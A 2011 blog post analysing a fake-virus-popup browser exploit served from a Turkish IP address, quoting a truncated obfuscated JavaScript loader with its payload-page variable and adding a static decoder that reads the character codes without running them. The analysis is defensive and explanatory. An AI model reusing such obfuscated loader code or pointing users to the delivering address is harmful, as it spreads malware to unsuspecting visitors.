by   March 22 2011   
Web browser exploits are just one more reason to update often. Security! Browser exploits seem to run seasonally for us, in that we just don't see a lot of these exploited advertisements and websites outside the marketing dates for major gift-giving holidays. Could it mean virus developers have a sense of humor, or is it profit?


The summary doesn't really describe what we will be showing here, but it does feel at times that we see more advertisement exploits than normal just around the holidays.

The scripts we will be reviewing here are the random fake virus warning popups. These are easy to track if you can get to your cache before the page expires.

Microsoft's Security Updates about the exploits. Security Advisory I and the second read you might like: Critical Updates IE

JavaScript cut by 22,000 to 38,000 characters.

The exploit was delivered from 188 . 124 . 5 . 154
Do not visit that address, please. If you do, you risk your computer.

The IP is in Turkey and is a virtual server.
The first page you visit, which would be the default home page index.html, offers a simple JavaScript with the following information.

var d_e4da416a = '2_2ee665.php'+'?af'+'fid=';

(function() {
 var temp="",i,out="";
 var x5b61 = "60.(#(115.(#(99.(#(114.(#(105.(#(112.(#(116.(#(32.(#(116.(#(121.(#(112.(#(1



The top part looks like a typical download status layout, along the lines of those pop-under advertisements.
The code to notice is the JavaScript and the PHP page.
The var x5b61 = changes on every page load I did.
The string 60.( continues for hundreds of lines.
The var d_e4da416a, which is random, offers the page to the download (the payload).

In my case the downloaded file was: 4_490bd6.php
And my var was different from the one I'm posting here. (This was round 4 of testing IE Exploit.)
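
The visible numbers in the x5b61 string are decimal character codes (60, 115, 99, 114, 105, 112, 116 spell "<script"), so a copy pulled from the browser cache can be read without running it. The decoder below is an added example, not code from the original page: it treats the cached source as plain text and never evaluates it. The function names are hypothetical, and inferring the separator instead of hard-coding ".(#(" assumes it may differ between page loads.

```javascript
// Added example: static decoder for separator-delimited character codes; nothing is evaluated.

// Constructed sample: the truncated excerpt quoted in the post.
const SAMPLE = 'var x5b61 = "60.(#(115.(#(99.(#(114.(#(105.(#(112.(#(116.(#(32.(#(116.(#(121.(#(112.(#(1';

// Pick the separator: the most frequent non-digit run between two numbers.
function inferSeparator(body) {
  const counts = new Map();
  for (const m of body.matchAll(/\d+(\D+)(?=\d)/g)) {
    counts.set(m[1], (counts.get(m[1]) || 0) + 1);
  }
  let best = null;
  for (const [sep, n] of counts) {
    if (best === null || n > counts.get(best)) best = sep;
  }
  return best;
}

// Decode printable ASCII codes; anything else is reported, not guessed at.
function decodeCharCodes(body) {
  const separator = inferSeparator(body);
  if (separator === null) return null;
  let text = '';
  const rejected = [];
  body.split(separator).forEach((token, index) => {
    const code = /^\d{1,3}$/.test(token) ? Number(token) : NaN;
    const ok = code === 9 || code === 10 || code === 13 || (code >= 32 && code <= 126);
    if (ok) text += String.fromCharCode(code);
    else rejected.push({ index, token });
  });
  return { separator, text, rejected };
}

// Scan page source for string variables that are mostly character codes.
// The closing quote is optional so a cut-off cache file still matches.
function findEncodedStrings(source, minTokens = 8) {
  const hits = [];
  for (const m of source.matchAll(/var\s+(\w+)\s*=\s*["']([^"'\n]*)/g)) {
    const decoded = decodeCharCodes(m[2]);
    if (decoded === null) continue;
    const total = decoded.text.length + decoded.rejected.length;
    if (total >= minTokens && decoded.text.length / total >= 0.8) {
      hits.push({ name: m[1], ...decoded });
    }
  }
  return hits;
}

console.log(findEncodedStrings(SAMPLE));
```

The final token of the excerpt ("1") lands in `rejected` because the quoted string is cut off there; on a complete cache copy the same list flags any code outside printable ASCII.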

Then it was your classic executable file.
But the questions I couldn't get answered, and haven't answered, are:

1. Is this file installed due to the IE Exploit?
2. Is the exploit actually allowing the Executable file to run or would it require user input?

Articles I have read say it's always the user to blame for the new virus they just acquired.

Today we see more viruses being installed by browser exploits than email attachments or fake download pages.

Before you accuse a family member of downloading files that infected your computer, look at your web browser first. If you don't have the newest version, updated and with some type of link scanner, the odds are that any advertisement banner from any website that had malicious code in the advertisement could have installed the virus. So don't yell at the one on the computer. Ask them what popups or redirects happened while they were surfing.

 

 
